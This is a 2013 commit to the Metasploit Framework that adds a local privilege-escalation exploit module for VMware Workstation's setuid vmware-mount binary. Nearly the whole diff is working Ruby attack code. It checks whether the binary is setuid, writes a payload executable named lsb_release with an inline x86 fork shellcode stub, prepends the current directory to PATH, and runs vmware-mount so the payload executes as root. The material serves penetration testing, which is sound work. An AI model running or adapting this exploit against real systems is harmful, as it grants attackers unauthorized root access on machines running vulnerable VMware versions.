Add local exploit for taviso's vmware privesc

egypt · egypt · commit 63786f9e8625 · 2013-08-26T21:06:40.000-05:00
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
@@ -0,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit4 < Msf::Exploit::Local
+
+	include Msf::Exploit::EXE
+	include Msf::Post::Common
+	include Msf::Post::File
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'          => 'VMWare Setuid vmware-mount Unsafe popen',
+				'Description'   => %q{
+					VMWare Workstation (up to and including 9.0.2 build-1031769)
+					and Player have a setuid executable called vmware-mount that
+					invokes lsb_release in the PATH with popen(3). Since PATH is
+					user-controlled, and the default system shell on
+					Debian-derived distributions does not drop privs, we can put
+					an arbitrary payload in an executable called lsb_release and
+					have vmware-mount happily execute it as root for us.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'egypt'],
+				'Platform'      => [ 'linux' ],
+				'Arch'          => ARCH_X86,
+				'Targets'       =>
+					[
+						[ 'Automatic', { } ],
+					],
+				'DefaultOptions' => {
+					"PrependSetresuid" => true,
+					"PrependSetresgid" => true,
+				},
+				'DefaultTarget' => 0,
+				'References' => [
+					[ 'URL', "http://blog.cmpxchg8b.com/2013/08/security-debianisms.html" ],
+				]
+			}
+			))
+		# Handled by ghetto hardcoding below.
+		deregister_options("PrependFork")
+	end
+
+	def check
+		if setuid?("/usr/bin/vmware-mount")
+			CheckCode::Vulnerable
+		else
+			CheckCode::Safe
+		end
+	end
+
+	def exploit
+		unless check == CheckCode::Vulnerable
+			fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
+		end
+
+		# Ghetto PrependFork action which is apparently only implemented for
+		# Meterpreter.
+		# XXX Put this in a mixin somewhere
+		exe = generate_payload_exe(
+			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
+		)
+		write_file("lsb_release", exe)
+
+		cmd_exec("chmod +x lsb_release")
+		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+		cmd_exec("rm -f lsb_release")
+	end
+
+	def setuid?(remote_file)
+		!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
+	end
+
+end
+
